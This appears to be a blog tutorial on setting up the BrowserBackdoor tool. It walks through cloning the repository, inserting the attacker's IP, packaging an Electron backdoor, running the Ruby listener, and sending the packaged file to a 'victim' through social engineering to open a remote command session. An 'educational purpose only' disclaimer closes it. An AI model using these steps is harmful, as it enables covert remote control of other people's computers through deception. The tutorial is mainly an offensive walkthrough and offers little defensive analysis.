HACK REMOTE PC USING BROWSER – JAVASCRIPT WEBSOCKET BACKDOOR

BrowserBackdoor is an Electron application that uses a JavaScript WebSocket Backdoor to connect to the listener.

b1

BrowserBackdoorServer is a WebSocket server that listens for incoming WebSocket connections and creates a command-line interface for sending commands to the remote system.

The JavaScript backdoor in BrowserBackdoor can be used on all browsers that support WebSockets.

First clone BrowserBackdoorServer repository from github, to do so type:

https://github.com/IMcPwn/browser-backdoor.git

b2

Follow the below steps one by one:

cd client

npm install

b3

Now go to the client folder and open index.html file in leafpad and edit the following line now type your kali Linux ip screenshot is given below.

After finishing the above task it will create the Browser backdoor script folder for windows and Linux users

b5

Now type the following command step by step

npm install electron-packager -g

electron-packager . –all

b6

Now go to the server folder in browser-backdoor directory and the following command

Bundle install

b7

After that start browser backdoor by typing in terminal:

ruby bbsconsole.rb

Now send the Brwoserbackdoor-win32-x64 to the victim using any social engineering method when the victim clink on BrowserBackdoor file you can get the victim session example are given below.

Now type the session command to check the active session it will show you the session with id no.

Type the target command with session id to interact with current session sees the following example

Target 0

 Now if you want to more option type the help command you can get the list of all available command

b8

NOTE: This post is only to make people aware of this backdoor i.e. Educational purpose only.

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s